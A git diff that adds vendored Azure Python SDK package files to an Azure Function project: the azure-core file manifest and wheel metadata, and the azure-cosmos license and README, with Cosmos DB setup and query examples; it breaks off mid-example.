+azure/core/pipeline/__pycache__/_tools_async.cpython-39.pyc,, +azure/core/pipeline/_base.py,sha256=3WJ_8PuhO59_TZWiAlBGdvyMcDt0GQ6Zc3XtKpC2fLA,8228 +azure/core/pipeline/_base_async.py,sha256=H6VWlzsLdHqzfXN-Ue4ntaCU5Rz7_Y8KvBmKXAkg9I4,8716 +azure/core/pipeline/_tools.py,sha256=Teaw6l4Bb6MoQgVuxoWvg7rV-_ykok0N91AOQqbDQPw,2741 +azure/core/pipeline/_tools_async.py,sha256=f64IEsu2HiuQ7rZ7EFIokAbbG7cqlG-HL1cq3J23vbQ,2188 +azure/core/pipeline/policies/__init__.py,sha256=iQHzPD52APenz4Y3XX0yrRjKZqul-x48w7AERmEWW0E,2787 +azure/core/pipeline/policies/__pycache__/__init__.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_authentication.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_authentication_async.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_base.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_base_async.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_custom_hook.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_distributed_tracing.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_redirect.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_redirect_async.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_retry.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_retry_async.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_universal.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_utils.cpython-39.pyc,, +azure/core/pipeline/policies/_authentication.py,sha256=yXi_LYgTIcCogBq4cCBAwLLGSWT-YcSiyXy7WsY-rqQ,9128 +azure/core/pipeline/policies/_authentication_async.py,sha256=5AdK4FLzcBjVven90V1E2oH-8nJNanySyFnAmu43h6M,6150 +azure/core/pipeline/policies/_base.py,sha256=XCoLZEYUPlogtgIQjZzUQUkjwsHZxRy9-oFz99A6iM8,5738 +azure/core/pipeline/policies/_base_async.py,sha256=-ZxsftPaqeGGHvPEGIp1pwyOGwW0ejzJ2NrJTQn_Av8,3205 +azure/core/pipeline/policies/_custom_hook.py,sha256=srdn66i2S3a0EgjAWtRZrrcQmG0NOzcl0B4vnNSA2kY,3405 +azure/core/pipeline/policies/_distributed_tracing.py,sha256=SFn7EUV1FBzLOfogaUOi-MNL1K7MouJpj7oa59x7-7o,5602 +azure/core/pipeline/policies/_redirect.py,sha256=ATlSoK4AFxJkqhbj-8pfcUogIRNQn7w4Sv5-XRk1YbI,7155 +azure/core/pipeline/policies/_redirect_async.py,sha256=NibTj1tsEdA5bX86j2cX_dv3w21bp0AajOf2awiSVTk,3368 +azure/core/pipeline/policies/_retry.py,sha256=VJNB3MAovSR_G229_0y4JjK9MOLzOj0uKwaxxs0Udks,20857 +azure/core/pipeline/policies/_retry_async.py,sha256=AvO-mulEyGJj_8dsi0-ZuKelZh5iN47H1xzVAbiFiRA,8043 +azure/core/pipeline/policies/_universal.py,sha256=IfY5w-mwaNE4N5HTMPtCTvSXueUsRbsk5lyB4C6Idb0,30074 +azure/core/pipeline/policies/_utils.py,sha256=2A9XSTnnIaVungDXTCSCd5xcWCW6GIYIoIaF1Onrtsg,2785 +azure/core/pipeline/transport/__init__.py,sha256=kMLW4m5QVBIN5eacIDpLYY01vvs-722nva5UuUIdsQo,6269 +azure/core/pipeline/transport/__pycache__/__init__.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_aiohttp.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_base.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_base_async.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_base_requests_async.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_bigger_block_size_http_adapters.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_requests_asyncio.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_requests_basic.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_requests_trio.cpython-39.pyc,, +azure/core/pipeline/transport/_aiohttp.py,sha256=wiKFlM7_4QPD9ODvak9fcOU0l6lfKyJWL5L0O7PW6s0,18124 +azure/core/pipeline/transport/_base.py,sha256=TyOV4tEDGKvsB3N2meG06vKxAXo5df29ulzdJySRyOw,26854 +azure/core/pipeline/transport/_base_async.py,sha256=LLFb_Agxgn-shYQKuXaoICIsYG6tjL8U_P2QbcfIDyU,4848 +azure/core/pipeline/transport/_base_requests_async.py,sha256=8oo3z2tNIxmnqFvlT0IxXEIIMaSEn6jJO9RSk6UWgAU,2326 +azure/core/pipeline/transport/_bigger_block_size_http_adapters.py,sha256=3J9XvXT0m1Cb4QtZ5IvLn8GwhkFGKSoTKO6kavdmLmI,2177 +azure/core/pipeline/transport/_requests_asyncio.py,sha256=xhInFUGAIl9nSoQZgBALxuZXgNecvvlbNM16KRY9UWs,11013 +azure/core/pipeline/transport/_requests_basic.py,sha256=Yd_wwV8b15jXJyCYfdDDRQA0pKdx8589kTbhTKb6K3I,15200 +azure/core/pipeline/transport/_requests_trio.py,sha256=DyHX-UyWkUjVMVLIxluxNhIEXkfUap18jqMoj3iTdFs,11801 +azure/core/polling/__init__.py,sha256=ERr8iZ2zn9qcWbhFV2HV1UlAgHaEE28woP_hFix6yJI,1728 +azure/core/polling/__pycache__/__init__.cpython-39.pyc,, +azure/core/polling/__pycache__/_async_poller.cpython-39.pyc,, +azure/core/polling/__pycache__/_poller.cpython-39.pyc,, +azure/core/polling/__pycache__/async_base_polling.cpython-39.pyc,, +azure/core/polling/__pycache__/base_polling.cpython-39.pyc,, +azure/core/polling/_async_poller.py,sha256=phsRpKCsl38njkhexv9dK4lfVvXzKi4bQsKxTuKVWiQ,7923 +azure/core/polling/_poller.py,sha256=umaQcxKPBmfhL8pfvqxd1l9fQpqytVUAVUzd45XlD8A,11619 +azure/core/polling/async_base_polling.py,sha256=MDeE0-DgwIpFu94MlOqtK6QFDKqfKQvLtlayq7bL7NQ,5579 +azure/core/polling/base_polling.py,sha256=1xeTOWdm0umObOy_ja44f6sr6qWKLzH2ulDTWKdguNg,22086 +azure/core/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +azure/core/rest/__init__.py,sha256=cudRw63l2iHhs58vrYie2pJ686jeBxoCTaXCtmTtcDY,1768 +azure/core/rest/__pycache__/__init__.cpython-39.pyc,, +azure/core/rest/__pycache__/_aiohttp.cpython-39.pyc,, +azure/core/rest/__pycache__/_helpers.cpython-39.pyc,, +azure/core/rest/__pycache__/_http_response_impl.cpython-39.pyc,, +azure/core/rest/__pycache__/_http_response_impl_async.cpython-39.pyc,, +azure/core/rest/__pycache__/_requests_asyncio.cpython-39.pyc,, +azure/core/rest/__pycache__/_requests_basic.cpython-39.pyc,, +azure/core/rest/__pycache__/_requests_trio.cpython-39.pyc,, +azure/core/rest/__pycache__/_rest.cpython-39.pyc,, +azure/core/rest/__pycache__/_rest_py3.cpython-39.pyc,, +azure/core/rest/_aiohttp.py,sha256=brFAVmwZRi8K1sHWLccZw9p-L14uoQ4d-IYlw02j7R0,7219 +azure/core/rest/_helpers.py,sha256=gnyXIb_6gRTaw1tKn7fcoNl5t_GhP-LkGL4nstHrG60,13023 +azure/core/rest/_http_response_impl.py,sha256=6C54bg4mSkUl9vCgO8X-lKC3j277KuNjCrkoJykoRZ0,16737 +azure/core/rest/_http_response_impl_async.py,sha256=nQPHDUt3qVW8Bwoj7sJNo7ZwOXvunZGJg5yvR3WkAIw,6632 +azure/core/rest/_requests_asyncio.py,sha256=52vfjW6VbDzd6np0_w-1FANZicXLUO9Pz4kAA7Sgd9Q,2139 +azure/core/rest/_requests_basic.py,sha256=0Thaz0Gy7RadYRR5EoA9SX7i2vO-C-8v8lONUwO2fqk,4205 +azure/core/rest/_requests_trio.py,sha256=9UBWN_KLnhpOD8sF-YclbQT-gMXlB4GYeEqichDJDMc,2034 +azure/core/rest/_rest.py,sha256=WcGMWGRjeWX71LRIbaoJVcUyfch21_BwEVEO3TqvNIs,12003 +azure/core/rest/_rest_py3.py,sha256=Mo2Afc9u_9AgNBnGjwv9e0xv2d9oWrpHKS8eeXco_0M,13526 +azure/core/serialization.py,sha256=A1B2oLjKKg4wjI8BZENjTDPNQxHPzReiufwslveFOhU,3896 +azure/core/settings.py,sha256=GQCjmokZyyhp48a5SAGN4xxR3OUY14V8DQAv2Vpa4OM,13704 +azure/core/tracing/__init__.py,sha256=_9wnZW_6HABX9jE38u3cyUHQRfREMc5M_WV-QUG8ons,312 +azure/core/tracing/__pycache__/__init__.cpython-39.pyc,, +azure/core/tracing/__pycache__/_abstract_span.cpython-39.pyc,, +azure/core/tracing/__pycache__/common.cpython-39.pyc,, +azure/core/tracing/__pycache__/decorator.cpython-39.pyc,, +azure/core/tracing/__pycache__/decorator_async.cpython-39.pyc,, +azure/core/tracing/_abstract_span.py,sha256=RMidszH12QVzirZqcOZdpTUEXkE6kHz5z9S8fb-_nxM,7618 +azure/core/tracing/common.py,sha256=GDaDzpT-_fGMPuD2C7UozQYpyefcNFE6hyWhQzQQS2o,3969 +azure/core/tracing/decorator.py,sha256=K0aup7ZKG7F_zSt6QfNmZE2Vp7k2CJSSwT4wivFyN-c,3672 +azure/core/tracing/decorator_async.py,sha256=uQnYF7vsm37yRsN7sAxH5GUOQFNm-nEDa9UG01k3QQ4,3807 +azure/core/tracing/ext/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +azure/core/tracing/ext/__pycache__/__init__.cpython-39.pyc,, +azure/core/utils/__init__.py,sha256=tWKk3qMDB6SsIX-NWmp5Ut28A5wyxoPPoj29Jj44vQM,1608 +azure/core/utils/__pycache__/__init__.cpython-39.pyc,, +azure/core/utils/__pycache__/_connection_string_parser.cpython-39.pyc,, +azure/core/utils/__pycache__/_messaging_shared.cpython-39.pyc,, +azure/core/utils/__pycache__/_pipeline_transport_rest_shared.cpython-39.pyc,, +azure/core/utils/__pycache__/_pipeline_transport_rest_shared_async.cpython-39.pyc,, +azure/core/utils/__pycache__/_utils.cpython-39.pyc,, +azure/core/utils/_connection_string_parser.py,sha256=6dTmMa0S1Coq8AfdHq2o23f9h-R4GGRaeQwJEtifutw,2197 +azure/core/utils/_messaging_shared.py,sha256=jshGkPiWzxDNG_rDLEVue01EV5GWKs1IzaKZixXYOsA,1526 +azure/core/utils/_pipeline_transport_rest_shared.py,sha256=_TJ6ONW0rrG7Vy0H9z8FRDQDbXkJWWCgR98Ki4L-o1Y,13621 +azure/core/utils/_pipeline_transport_rest_shared_async.py,sha256=8O8pOsCxGHjafs2wvYfsS2LyhKZgSvvewxV1nSCSwAI,2459 +azure/core/utils/_utils.py,sha256=HPktJIvopAbolh8-hjt-X1umQ052jEWGQ2wMlAkkaiY,3699 +azure_core-1.24.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +azure_core-1.24.2.dist-info/LICENSE,sha256=_VMkgdgo4ToLE8y1mOAjOKNhd0BnWoYu5r3BVBto6T0,1073 +azure_core-1.24.2.dist-info/METADATA,sha256=8SSYAxah_qhri783JgJcL-lHuhAP0c_QXa0C7s2o8SM,32311 +azure_core-1.24.2.dist-info/RECORD,, +azure_core-1.24.2.dist-info/WHEEL,sha256=ewwEueio1C2XeHTvT17n8dZUJgOvyCWCt0WVNLClP9o,92 +azure_core-1.24.2.dist-info/top_level.txt,sha256=S7DhWV9m80TBzAhOFjxDUiNbKszzoThbnrSz5MpbHSQ,6 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/WHEEL new file mode 100644 index 0000000..725a409 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/top_level.txt new file mode 100644 index 0000000..f6434ca --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/top_level.txt @@ -0,0 +1 @@ +azure diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/LICENSE new file mode 100644 index 0000000..4437826 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/LICENSE @@ -0,0 +1,21 @@ +Copyright (c) Microsoft Corporation. + +MIT License + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/METADATA new file mode 100644 index 0000000..b88be26 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/METADATA @@ -0,0 +1,1018 @@ +Metadata-Version: 2.1 +Name: azure-cosmos +Version: 4.3.0 +Summary: Microsoft Azure Cosmos Client Library for Python +Home-page: https://github.com/Azure/azure-sdk-for-python +Author: Microsoft Corporation +Author-email: askdocdb@microsoft.com +Maintainer: Microsoft +Maintainer-email: askdocdb@microsoft.com +License: MIT License +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: Natural Language :: English +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: License :: OSI Approved :: MIT License +Requires-Python: >=3.6 +Description-Content-Type: text/markdown +Requires-Dist: azure-core (<2.0.0,>=1.23.0) + +## _Disclaimer_ +_Azure SDK Python packages support for Python 2.7 has ended 01 January 2022. For more information and questions, please refer to https://github.com/Azure/azure-sdk-for-python/issues/20691_ + +# Azure Cosmos DB SQL API client library for Python + +Azure Cosmos DB is a globally distributed, multi-model database service that supports document, key-value, wide-column, and graph databases. + +Use the Azure Cosmos DB SQL API SDK for Python to manage databases and the JSON documents they contain in this NoSQL database service. High level capabilities are: + +* Create Cosmos DB **databases** and modify their settings +* Create and modify **containers** to store collections of JSON documents +* Create, read, update, and delete the **items** (JSON documents) in your containers +* Query the documents in your database using **SQL-like syntax** + +[SDK source code][source_code] | [Package (PyPI)][cosmos_pypi] | [API reference documentation][ref_cosmos_sdk] | [Product documentation][cosmos_docs] | [Samples][cosmos_samples] + +> This SDK is used for the [SQL API](https://docs.microsoft.com/azure/cosmos-db/sql-query-getting-started). For all other APIs, please check the [Azure Cosmos DB documentation](https://docs.microsoft.com/azure/cosmos-db/introduction) to evaluate the best SDK for your project. + +## Getting started + +### Important update on Python 2.x Support + +New releases of this SDK won't support Python 2.x starting January 1st, 2022. Please check the [CHANGELOG](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/cosmos/azure-cosmos/CHANGELOG.md) for more information. + +### Prerequisites + +* Azure subscription - [Create a free account][azure_sub] +* Azure [Cosmos DB account][cosmos_account] - SQL API +* [Python 3.6+][python] + +If you need a Cosmos DB SQL API account, you can create one with this [Azure CLI][azure_cli] command: + +```Bash +az cosmosdb create --resource-group --name +``` + +### Install the package + +```bash +pip install azure-cosmos +``` + +#### Configure a virtual environment (optional) + +Although not required, you can keep your base system and Azure SDK environments isolated from one another if you use a virtual environment. Execute the following commands to configure and then enter a virtual environment with [venv][venv]: + +```Bash +python3 -m venv azure-cosmosdb-sdk-environment +source azure-cosmosdb-sdk-environment/bin/activate +``` + +### Authenticate the client + +Interaction with Cosmos DB starts with an instance of the [CosmosClient][ref_cosmosclient] class. You need an **account**, its **URI**, and one of its **account keys** to instantiate the client object. + +Use the Azure CLI snippet below to populate two environment variables with the database account URI and its primary master key (you can also find these values in the Azure portal). The snippet is formatted for the Bash shell. + +```Bash +RES_GROUP= +ACCT_NAME= + +export ACCOUNT_URI=$(az cosmosdb show --resource-group $RES_GROUP --name $ACCT_NAME --query documentEndpoint --output tsv) +export ACCOUNT_KEY=$(az cosmosdb list-keys --resource-group $RES_GROUP --name $ACCT_NAME --query primaryMasterKey --output tsv) +``` + +### Create the client + +Once you've populated the `ACCOUNT_URI` and `ACCOUNT_KEY` environment variables, you can create the [CosmosClient][ref_cosmosclient]. + +```Python +from azure.cosmos import CosmosClient + +import os +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY) +``` + +### AAD Authentication + +You can also authenticate a client utilizing your service principal's AAD credentials and the azure identity package. +You can directly pass in the credentials information to ClientSecretCrednetial, or use the DefaultAzureCredential: +```Python +from azure.cosmos import CosmosClient +from azure.identity import ClientSecretCredential, DefaultAzureCredential + +import os +url = os.environ['ACCOUNT_URI'] +tenant_id = os.environ['TENANT_ID'] +client_id = os.environ['CLIENT_ID'] +client_secret = os.environ['CLIENT_SECRET'] + +# Using ClientSecretCredential +aad_credentials = ClientSecretCredential( + tenant_id=tenant_id, + client_id=client_id, + client_secret=client_secret) + +# Using DefaultAzureCredential (recommended) +aad_credentials = DefaultAzureCredential() + +client = CosmosClient(url, aad_credentials) +``` +Always ensure that the managed identity you use for AAD authentication has `readMetadata` permissions.
+More information on how to set up AAD authentication: [Set up RBAC for AAD authentication](https://docs.microsoft.com/azure/cosmos-db/how-to-setup-rbac)
+More information on allowed operations for AAD authenticated clients: [RBAC Permission Model](https://aka.ms/cosmos-native-rbac) + +## Key concepts + +Once you've initialized a [CosmosClient][ref_cosmosclient], you can interact with the primary resource types in Cosmos DB: + +* [Database][ref_database]: A Cosmos DB account can contain multiple databases. When you create a database, you specify the API you'd like to use when interacting with its documents: SQL, MongoDB, Gremlin, Cassandra, or Azure Table. Use the [DatabaseProxy][ref_database] object to manage its containers. + +* [Container][ref_container]: A container is a collection of JSON documents. You create (insert), read, update, and delete items in a container by using methods on the [ContainerProxy][ref_container] object. + +* Item: An Item is the dictionary-like representation of a JSON document stored in a container. Each Item you add to a container must include an `id` key with a value that uniquely identifies the item within the container. + +For more information about these resources, see [Working with Azure Cosmos databases, containers and items][cosmos_resources]. + + +## How to use `enable_cross_partition_query` + +The keyword-argument `enable_cross_partition_query` accepts 2 options: `None` (default) or `True`. + +## Note on using queries by id + +When using queries that try to find items based on an **id** value, always make sure you are passing in a string type variable. Azure Cosmos DB only allows string id values and if you use any other datatype, this SDK will return no results and no error messages. + +## Note on client consistency levels + +As of release version 4.3.0b3, if a user does not pass in an explicit consistency level to their client initialization, +their client will use their database account's default level. Previously, the default was being set to `Session` consistency. +If for some reason you'd like to keep doing this, you can change your client initialization to include the explicit parameter for this like shown: +```Python +from azure.cosmos import CosmosClient + +import os +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY, consistency_level='Session') +``` + +## Limitations + +Currently the features below are **not supported**. For alternatives options, check the **Workarounds** section below. + +### Data Plane Limitations: + +* Group By queries +* Queries with COUNT from a DISTINCT subquery: SELECT COUNT (1) FROM (SELECT DISTINCT C.ID FROM C) +* Bulk/Transactional batch processing +* Direct TCP Mode access +* Continuation token for cross partitions queries +* Change Feed: Processor +* Change Feed: Read multiple partitions key values +* Change Feed: Read specific time +* Change Feed: Read from the beginning +* Change Feed: Pull model +* Cross-partition ORDER BY for mixed types + +### Control Plane Limitations: + +* Get CollectionSizeUsage, DatabaseUsage, and DocumentUsage metrics +* Create Geospatial Index +* Provision Autoscale DBs or containers +* Update Autoscale throughput +* Update analytical store ttl (time to live) +* Get the connection string +* Get the minimum RU/s of a container + +## Workarounds + +### Bulk processing Limitation Workaround + +If you want to use Python SDK to perform bulk inserts to Cosmos DB, the best alternative is to use [stored procedures](https://docs.microsoft.com/azure/cosmos-db/how-to-write-stored-procedures-triggers-udfs) to write multiple items with the same partition key. + +### Control Plane Limitations Workaround + +Typically, you can use [Azure Portal](https://portal.azure.com/), [Azure Cosmos DB Resource Provider REST API](https://docs.microsoft.com/rest/api/cosmos-db-resource-provider), [Azure CLI](https://docs.microsoft.com/cli/azure/azure-cli-reference-for-cosmos-db) or [PowerShell](https://docs.microsoft.com/azure/cosmos-db/manage-with-powershell) for the control plane unsupported limitations. + +## Boolean Data Type + +While the Python language [uses](https://docs.python.org/3/library/stdtypes.html?highlight=boolean#truth-value-testing) "True" and "False" for boolean types, Cosmos DB [accepts](https://docs.microsoft.com/azure/cosmos-db/sql-query-is-bool) "true" and "false" only. In other words, the Python language uses Boolean values with the first uppercase letter and all other lowercase letters, while Cosmos DB and its SQL language use only lowercase letters for those same Boolean values. How to deal with this challenge? + +* Your JSON documents created with Python must use "True" and "False", to pass the language validation. The SDK will convert it to "true" and "false" for you. Meaning that "true" and "false" is what will be stored in Cosmos DB. +* If you retrieve those documents with the Cosmos DB Portal's Data Explorer, you will see "true" and "false". +* If you retrieve those documents with this Python SDK, "true" and "false" values will be automatically converted to "True" and "False". + +## SQL Queries x FROM Clause Subitems + +This SDK uses the [query_items](https://docs.microsoft.com/python/api/azure-cosmos/azure.cosmos.containerproxy?preserve-view=true&view=azure-python#query-items-query--parameters-none--partition-key-none--enable-cross-partition-query-none--max-item-count-none--enable-scan-in-query-none--populate-query-metrics-none----kwargs-) method to submit SQL queries to Azure Cosmos DB. + +Cosmos DB SQL language allows you to [get subitems by using the FROM clause](https://docs.microsoft.com/azure/cosmos-db/sql-query-from#get-subitems-by-using-the-from-clause), to reduce the source to a smaller subset. As an example, you can use `select * from Families.children` instead of `select * from Families`. But please note that: + +* For SQL queries using the `query_items` method, this SDK demands that you specify the `partition_key` or use the `enable_cross_partition_query` flag. +* If you are getting subitems and specifying the `partition_key`, please make sure that your partition key is included in the subitems, which is not true for most of the cases. + +## Max Item Count + +This is a parameter of the query_items method, an integer indicating the maximum number of items to be returned per page. The `None` value can be specified to let the service determine the optimal item count. This is the recommended configuration value, and the default behavior of this SDK when it is not set. + +## Examples + +The following sections provide several code snippets covering some of the most common Cosmos DB tasks, including: + +* [Create a database](#create-a-database "Create a database") +* [Create a container](#create-a-container "Create a container") +* [Create an analytical store enabled container](#create-an-analytical-store-enabled-container "Create a container") +* [Get an existing container](#get-an-existing-container "Get an existing container") +* [Insert data](#insert-data "Insert data") +* [Delete data](#delete-data "Delete data") +* [Query the database](#query-the-database "Query the database") +* [Get database properties](#get-database-properties "Get database properties") +* [Get database and container throughputs](#get-database-and-container-throughputs "Get database and container throughputs") +* [Modify container properties](#modify-container-properties "Modify container properties") +* [Using the asynchronous client](#using-the-asynchronous-client "Using the asynchronous client") + +### Create a database + +After authenticating your [CosmosClient][ref_cosmosclient], you can work with any resource in the account. The code snippet below creates a SQL API database, which is the default when no API is specified when [create_database][ref_cosmosclient_create_database] is invoked. + +```Python +from azure.cosmos import CosmosClient, exceptions +import os + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY) +DATABASE_NAME = 'testDatabase' +try: + database = client.create_database(DATABASE_NAME) +except exceptions.CosmosResourceExistsError: + database = client.get_database_client(DATABASE_NAME) +``` + +### Create a container + +This example creates a container with default settings. If a container with the same name already exists in the database (generating a `409 Conflict` error), the existing container is obtained instead. + +```Python +from azure.cosmos import CosmosClient, PartitionKey, exceptions +import os + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY) +DATABASE_NAME = 'testDatabase' +database = client.get_database_client(DATABASE_NAME) +CONTAINER_NAME = 'products' + +try: + container = database.create_container(id=CONTAINER_NAME, partition_key=PartitionKey(path="/productName")) +except exceptions.CosmosResourceExistsError: + container = database.get_container_client(CONTAINER_NAME) +except exceptions.CosmosHttpResponseError: + raise +``` + +### Create an analytical store enabled container + +This example creates a container with [Analytical Store](https://docs.microsoft.com/azure/cosmos-db/analytical-store-introduction) enabled, for reporting, BI, AI, and Advanced Analytics with [Azure Synapse Link](https://docs.microsoft.com/azure/cosmos-db/synapse-link). + +The options for analytical_storage_ttl are: + ++ 0 or Null or not informed: Not enabled. ++ -1: The data will be stored infinitely. ++ Any other number: the actual ttl, in seconds. + + +```Python +CONTAINER_NAME = 'products' +try: + container = database.create_container(id=CONTAINER_NAME, partition_key=PartitionKey(path="/productName"),analytical_storage_ttl=-1) +except exceptions.CosmosResourceExistsError: + container = database.get_container_client(CONTAINER_NAME) +except exceptions.CosmosHttpResponseError: + raise +``` + +The preceding snippets also handle the [CosmosHttpResponseError][ref_httpfailure] exception if the container creation failed. For more information on error handling and troubleshooting, see the [Troubleshooting](#troubleshooting "Troubleshooting") section. + +### Get an existing container + +Retrieve an existing container from the database: + +```Python +from azure.cosmos import CosmosClient +import os + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY) +DATABASE_NAME = 'testDatabase' +database = client.get_database_client(DATABASE_NAME) +CONTAINER_NAME = 'products' +container = database.get_container_client(CONTAINER_NAME) +``` + +### Insert data + +To insert items into a container, pass a dictionary containing your data to [ContainerProxy.upsert_item][ref_container_upsert_item]. Each item you add to a container must include an `id` key with a value that uniquely identifies the item within the container. + +This example inserts several items into the container, each with a unique `id`: + +```Python +from azure.cosmos import CosmosClient +import os + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY) +DATABASE_NAME = 'testDatabase' +database = client.get_database_client(DATABASE_NAME) +CONTAINER_NAME = 'products' +container = database.get_container_client(CONTAINER_NAME) + +for i in range(1, 10): + container.upsert_item({ + 'id': 'item{0}'.format(i), + 'productName': 'Widget', + 'productModel': 'Model {0}'.format(i) + } + ) +``` + +### Delete data + +To delete items from a container, use [ContainerProxy.delete_item][ref_container_delete_item]. The SQL API in Cosmos DB does not support the SQL `DELETE` statement. + +```Python +from azure.cosmos import CosmosClient +import os + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY) +DATABASE_NAME = 'testDatabase' +database = client.get_database_client(DATABASE_NAME) +CONTAINER_NAME = 'products' +container = database.get_container_client(CONTAINER_NAME) + +for item in container.query_items( + query='SELECT * FROM products p WHERE p.productModel = "Model 2"', + enable_cross_partition_query=True): + container.delete_item(item, partition_key='Widget') +``` + +> NOTE: If you are using partitioned collection, the value of the `partitionKey` in the example code above, should be set to the value of the partition key for this particular item, not the name of the partition key column in your collection. This holds true for both point reads and deletes. + +### Query the database + +A Cosmos DB SQL API database supports querying the items in a container with [ContainerProxy.query_items][ref_container_query_items] using SQL-like syntax. + +This example queries a container for items with a specific `id`: + +```Python +from azure.cosmos import CosmosClient +import os + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY) +DATABASE_NAME = 'testDatabase' +database = client.get_database_client(DATABASE_NAME) +CONTAINER_NAME = 'products' +container = database.get_container_client(CONTAINER_NAME) + +# Enumerate the returned items +import json +for item in container.query_items( + query='SELECT * FROM mycontainer r WHERE r.id="item3"', + enable_cross_partition_query=True): + print(json.dumps(item, indent=True)) +``` + +> NOTE: Although you can specify any value for the container name in the `FROM` clause, we recommend you use the container name for consistency. + +Perform parameterized queries by passing a dictionary containing the parameters and their values to [ContainerProxy.query_items][ref_container_query_items]: + +```Python +discontinued_items = container.query_items( + query='SELECT * FROM products p WHERE p.productModel = @model', + parameters=[ + 